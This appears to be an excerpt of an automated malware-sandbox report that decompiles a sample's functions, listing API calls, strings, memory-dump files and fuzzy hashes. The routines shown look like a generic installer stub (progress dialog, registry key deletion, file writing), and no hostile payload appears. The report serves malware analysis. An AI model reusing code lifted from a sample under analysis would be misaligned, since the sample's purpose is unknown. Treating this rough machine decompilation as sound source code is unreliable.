0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?), ref: 00406952
CharNextW.USER32(?), ref: 00406961
CharNextW.USER32(?), ref: 00406966
CharPrevW.USER32(?,?), ref: 00406979

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0
*?|<>/":, xrefs: 00406941

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3083651966
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32 ref: 00403049
GetTickCount.KERNEL32(00000000), ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32 ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32 ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402F74

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
